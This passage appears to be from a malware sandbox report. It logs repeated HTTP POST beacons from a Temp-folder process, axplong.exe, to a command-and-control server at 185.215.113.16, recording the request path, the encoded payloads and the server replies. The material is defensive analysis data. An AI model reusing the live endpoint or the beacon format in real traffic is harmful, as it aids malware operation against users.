                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      22192.168.2.649744185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:29.588962078 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:30.354145050 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:30.355257034 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:30.604315042 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:30 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      23192.168.2.649745185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:30.716896057 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:31.473229885 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:31.474073887 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:31.724093914 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      24192.168.2.649746185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:31.838891983 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:32.624861956 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:32 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:32.625649929 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:32.878212929 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:32 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      25192.168.2.649747185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:32.993767977 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:33.735363007 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:33.736378908 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:33.992743015 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      26192.168.2.649748185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:34.103075981 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:34.939901114 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:34 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:34.941046000 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:35.188143015 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      27192.168.2.649749185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:35.306158066 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:36.089206934 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:36.090303898 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:36.343741894 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:36 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      28192.168.2.649750185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:36.465075016 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:37.226320982 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:37.227679968 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:37.488029957 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      29192.168.2.649752185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:37.603837013 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:38.357083082 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:38.360198975 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:38.608216047 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      30192.168.2.649753185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:38.729448080 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:39.525403976 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:39.526173115 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:39.781416893 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      31192.168.2.649754185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:39.903723001 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:40.645581961 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:40.646524906 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:40.894618988 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      32192.168.2.649755185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:41.009408951 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:41.798738956 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:41.800175905 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:42.064651966 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      33192.168.2.649756185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:42.181720972 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:42.935026884 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:42.935967922 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:43.186311960 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
